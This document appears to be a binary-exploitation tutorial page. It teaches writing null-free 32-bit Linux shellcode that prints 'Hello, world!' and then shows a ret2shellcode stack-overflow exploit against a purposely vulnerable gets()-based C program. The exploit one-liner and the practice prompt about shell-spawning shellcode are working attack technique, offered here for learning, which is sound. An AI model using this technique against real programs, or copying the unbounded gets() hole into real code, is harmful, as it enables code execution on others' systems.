ret2shellcode
Shellcode¶
/* hello_world.c */
#include <stdio.h>
int main(int argc, char *argv[])
{
printf("HelloWorld !\n");
return 0;
}
The computer can't understand high level languages , it can only understand machine level language which is 1 and 0 , so we made a software which convert our human understandable language in to machine code , called the compiler .
gcc hello_world.c -o hello_world
When you compile the above code what the compiler does is that it translate the above logic into machine level instructions which can be directly executed by the computer.
You can see the translate code from the binary with the following command
Note
objdump is a tool used to view information about a ELF file .
1 2 3 |
|
objdump -D -M intel hello_world
...
...
00000000000006b0 <main>:
6b0: 55 push rbp
6b1: 48 89 e5 mov rbp,rsp
6b4: 48 83 ec 10 sub rsp,0x10
6b8: 89 7d fc mov DWORD PTR [rbp-0x4],edi
6bb: 48 89 75 f0 mov QWORD PTR [rbp-0x10],rsi
6bf: 48 8d 3d 9e 00 00 00 lea rdi,[rip+0x9e] # 764 <_IO_stdin_used+0x4>
6c6: e8 95 fe ff ff call 560 <[email protected]>
6cb: b8 00 00 00 00 mov eax,0x0
6d0: c9 leave
6d1: c3 ret
...
...
Even if you write code in Assembly language it can't be directly executed by the computer , it should be again translated into machine level instruction which only consist of 1 and 0 , As you see in the above code the first assembly instruction of our main is push rbp
which is the assembly representation of 0x55
or 1010101
, this is what our computer actually understand and executes .
When you execute this binary it will be copied to the memory , and the computer will execute it's instruction one by one by reading from the memory .
┌──────────┐ ┌──────────┐ ┌────────────┐
│ fetch │ ─> │ decode │ ─> │ execute │
└──────────┘ └──────────┘ └────────────┘
^ ^ ^
│ │ │_ the operation is performed.
│ │_ computer understands which operation is to be performed.
│_ one instruction is fetched from the memory.
What if we were able to inject own our code into the memory of a process and change it's control flow to execute that code . We can make the process do some weird stuffs . But we can't write that logic in C or in assembly and write that to memory . We should encode our assembly instruction to machine code and use that .
Hello World¶
Let's write Assembly code which prints "Hello world" .
Earlier we used the C library function called the printf to print the data into the screen , Which is not a valid possibility since we are programming in the assembly .
Syscall
The kernel of an Operating System is responsible of managing all the low level stuffs and it provides the programmers an interface to manipulate them , Syscalls call is a programmatic way in which the program requests a service from the Operating System's kernel . This may include accessing the hard disk , writing to the screen or reading from a file etc …
$ strace ./hello_world
execve("./hello_world", ["./hello_world"], [/* 56 vars */]) = 0
brk(NULL) = 0x55f1ee7c5000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f5a2c5b4000
...
...
munmap(0x7f5a2c585000, 191761) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL) = 0x55f1ee7c5000
brk(0x55f1ee7e6000) = 0x55f1ee7e6000
write(1, "HelloWorld !\n", 13HelloWorld !
) = 13
exit_group(0) = ?
Note
strace
is a tools which can be used to display the syscalls used by a program .
As you can see, the compiled program does more than just print a string. The system calls at the start are setting up the environment and memory for the program, but the important part is the write() syscall . This is what actually outputs the string.
The Unix manual pages are separated into sections. Section 2 contains the manual pages for system calls, so man 2 write
will describe the use of the write() system call:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
The strace output also shows the arguments for the syscall. The buf and count arguments are a pointer to our string and its length. The fd argument 1 is a special standard file descriptor. File descriptors are used for almost everything in Unix: input, output, file access, network sockets, and so on. A file descriptor is a indicator used to access a opened file or other input/output resource. The first three file descriptor numbers (0, 1, and 2) are automatically used for standard input, output, and error. so if you open a new file the unique number is used to refer that opened file and that number is called a file discriptor.
Writing bytes to standard output’s file descriptor of 1 will print the bytes; reading from standard input’s file descriptor of 0 will input bytes. The standard error file descriptor of 2 is used to display the error or debugging messages that can be filtered from the standard output.
In linux all the syscalls are referred with a predefined number and the arguments to the syscalls are placed on to the registers. How syscalls are called will be different for 32bit and 64 bit , So we will be focusing on 32 bit shellcode.
On 32 bit x86 Architecture a syscall is called by the int x80
instruction . it will call the syscall which corresponds to the number stored in the eax
register , and the arguments are passed through ebx
, ecx
, edx
registers .
section .text ; Text segment
global _start ; Default entry point for ELF linking
_start:
jmp gotoCall ; Jump to gotCall
shellcode:
; SYSCALL: write(1,msg,14)
mov eax, 4 ; Put 4 into eax, since write is syscall #4.
mov ebx, 1 ; Put 1 into ebx, since stdout is 1.
pop ecx ; Pop the Address of hello world from the stack
mov edx, 14 ; Put 14 into edx, since our string is 14 bytes.
int 0x80 ; Call the kernel to make the system call happen.
; SYSCALL: exit(0)
mov eax, 1 ; Put 1 into eax, since exit is syscall #1.
mov ebx, 0 ; Exit with success.
int 0x80 ; Do the syscall.
gotoCall:
call shellcode ; Pushes the address of string to stack
db "Hello, world!", 0x0a ; The string and newline char
$ nasm -f elf hello_world.asm
$ ld -m elf_i386 hello_world.o
$ ./a.out
Note
nasm is a assembler , which converts the assembly program into machine understanding binary format. ld is used to create a executable from the output of the nasm tool.
The above assembly code prints "Hello, world!" and exits gracefully . We should avoid any code which produces absolute address since these shellcode will be injected to a running process and any reference it previously had will be invalid , So to get the address of the string hello world we will first jump the gotoCall
section and it contains a call instruction which will push the address of the next instruction to stack which will be the address of our string and jump to the shellcode section , now we can pop that address from the stack We can use objdump to extract the converted machine instructions.
$ objdump -D -M intel a.out
...
...
08048060 <_start>:
8048060: eb 1e jmp 8048080 <gotoCall>
08048062 <shellcode>:
8048062: b8 04 00 00 00 mov eax,0x4
8048067: bb 01 00 00 00 mov ebx,0x1
804806c: 59 pop ecx
804806d: ba 0e 00 00 00 mov edx,0xe
8048072: cd 80 int 0x80
8048074: b8 01 00 00 00 mov eax,0x1
8048079: bb 00 00 00 00 mov ebx,0x0
804807e: cd 80 int 0x80
08048080 <gotoCall>:
8048080: e8 dd ff ff ff call 8048062 <shellcode>
8048085: 48 dec eax ─
8048086: 65 6c gs ins BYTE PTR es:[edi],dx │
8048088: 6c ins BYTE PTR es:[edi],dx │
8048089: 6f outs dx,DWORD PTR ds:[esi] │ "Hello, world!"
804808a: 2c 20 sub al,0x20 │
804808c: 77 6f ja 80480fd <gotoCall╷0x7d> │
804808e: 72 6c jb 80480fc <gotoCall╵0x7c> │
8048090: 64 21 0a and DWORD PTR fs:[edx],ecx ─
...
...
The resultant shellcode is
"\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0e\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
You can use this code to debug the shellcode and test it
/* shellcode.c */
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0e" \
"\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00" \
"\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77" \
"\x6f\x72\x6c\x64\x21\x0a";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
$ gcc -m32 -fno-stack-protector -z execstack -no-pie shellcode.c
We have successfully created a shellcode , but the problem is NULL characters , in C a string is represented by a character array which ends with with a NULL character . This may cause problems with the shellcode when some string handling function manipulates this . So we will always try to make our shellcode NULL free.
Only way is to use assembly instruction which will not produce any NULL characters in them.
mov eax, 0x4
, here the move instruction uses a 32 bit register thus the encoding of this instruction also contains space to occupy this 32 bit value , since we have only given a constrain which only occupies one byte other 3 bytes will be NULL , One way to over come this is to move value to a lower register here al
1 |
|
Using lower register produced a null free code . When doing this we have to make sure to make the register value is zero other wise the previous value may corrupt our value
1 |
|
We can use xor instruction to make the register value null.
section .text ; Text segment
global _start ; Default entry point for ELF linking
_start:
jmp gotoCall ; Jump to gotCall
shellcode:
; SYSCALL: write(1,msg,14)
xor eax,eax ; Null the registers
xor ebx,ebx
xor edx,edx ; Does not need to xor ecx since pop will overwrite any previous value
mov al, 4 ; Put 4 into eax, since write is syscall #4.
mov bl, 1 ; Put 1 into ebx, since stdout is 1.
pop ecx ; Pop the Address of hello world from the stack
mov dl, 14 ; Put 14 into edx, since our string is 14 bytes.
int 0x80 ; Call the kernel to make the system call happen.
; SYSCALL: exit(0)
mov al, 1 ; Put 1 into eax, since exit is syscall #1.
xor ebx,ebx ; Exit with success.
int 0x80 ; Do the syscall.
gotoCall:
call shellcode ; Pushes the address of string to stack
db "Hello, world!", 0x0a ; The string and newline char
$ objdump -D -M intel a.out
...
...
08048060 <_start>:
8048060: eb 15 jmp 8048077 <gotoCall>
08048062 <shellcode>:
8048062: 31 c0 xor eax,eax
8048064: 31 db xor ebx,ebx
8048066: 31 d2 xor edx,edx
8048068: b0 04 mov al,0x4
804806a: b3 01 mov bl,0x1
804806c: 59 pop ecx
804806d: b2 0e mov dl,0xe
804806f: cd 80 int 0x80
8048071: b0 01 mov al,0x1
8048073: 31 db xor ebx,ebx
8048075: cd 80 int 0x80
08048077 <gotoCall>:
8048077: e8 e6 ff ff ff call 8048062 <shellcode>
804807c: 48 dec eax
804807d: 65 6c gs ins BYTE PTR es:[edi],dx
804807f: 6c ins BYTE PTR es:[edi],dx
8048080: 6f outs dx,DWORD PTR ds:[esi]
8048081: 2c 20 sub al,0x20
8048083: 77 6f ja 80480f4 <gotoCall+0x7d>
8048085: 72 6c jb 80480f3 <gotoCall+0x7c>
8048087: 64 21 0a and DWORD PTR fs:[edx],ecx
...
...
Shellcode
"\xeb\x15\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0e\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
Practice Problem
- Write a shellcode to open a file and a print it content
Use open syscall to open the file , then you can use read and write syscall.
- Shellcode to spawn a shell
man 2 execve
Reference:
ret2shellcode¶
Let's get into how we can use our previously created shellcode.
/* ret2shellcode.c */
#include <stdio.h>
#include <string.h>
char buf[0x100];
int main()
{
char inp[0x100]={0};
gets(inp);
strncpy(buf,inp,256);
return 0;
}
Binary file : ret2shellcode
The code clearly has a buffer overflow bug which enables us to change the control flow of the program by overwriting the saved return address of main . Now the question is to find a suitable place to jump .
The main function reads a input from the user and that input is copied to a global variable called buf .
Let's look into the assembly of main
$ pidof ret2shellcode
17255
$ cat /proc/17255/maps
08048000-08049000 r-xp 00000000 08:01 1516600 /tmp/ret2shellcode
08049000-0804a000 r-xp 00000000 08:01 1516600 /tmp/ret2shellcode
0804a000-0804b000 rwxp 00001000 08:01 1516600 /tmp/ret2shellcode
09d0f000-09d30000 rwxp 00000000 00:00 0 [heap]
f754e000-f76ff000 r-xp 00000000 08:01 5115852 /lib/i386-linux-gnu/libc-2.24.so
f76ff000-f7701000 r-xp 001b0000 08:01 5115852 /lib/i386-linux-gnu/libc-2.24.so
f7701000-f7702000 rwxp 001b2000 08:01 5115852 /lib/i386-linux-gnu/libc-2.24.so
f7702000-f7705000 rwxp 00000000 00:00 0
f7734000-f7737000 rwxp 00000000 00:00 0
f7737000-f7739000 r--p 00000000 00:00 0 [vvar]
f7739000-f773b000 r-xp 00000000 00:00 0 [vdso]
f773b000-f775e000 r-xp 00000000 08:01 5115848 /lib/i386-linux-gnu/ld-2.24.so
f775e000-f775f000 r-xp 00022000 08:01 5115848 /lib/i386-linux-gnu/ld-2.24.so
f775f000-f7760000 rwxp 00023000 08:01 5115848 /lib/i386-linux-gnu/ld-2.24.so
ffdd5000-ffdf6000 rwxp 00000000 00:00 0 [stack]
It is the memory mapping of our program , In linux all the details about a process is inside /proc/$PID/
directory and the maps file holds the detail of the processes memory mapping , the pidof
command returns the PID of the process.
If you notice the address of buf 0x804a040
lies between 0x0804a000-0x0804b000
address and the previous output shows us that that region has executable permission . ie , if we put some valid instruction at that address and change the execution flow to that address those instruction it will be executed.
1 |
|
So , we can give our shellcode as an input and overflow the return address to jump to the address of buf , and our shellcode will be executed
Note
if the shellcode contains a null character , strncpy
function will only copy the input till that position other will be discarded , this will corrupt our shellcode copied into buf
.
So our payload will contain shellcode + junk + address of buf (overwrites return address)
.
If you use the shellcode we generated above it will cause problem since our hello world string ends with a new line , the gets
function stops reading when a new line is encountered thus rest of the payload will not be taken , we just need to change the last "\x0a" byte to a null byte .
Exploit
python -c 'print "\xeb\x15\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0e\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x00" + "A" * 222 + "\x08\x04\xa0\x40"[::-1]' | ./ret2shellcode
Hello, world!
We have successfully executed the shellcode , you can debug the program with gdb to see the magic happening.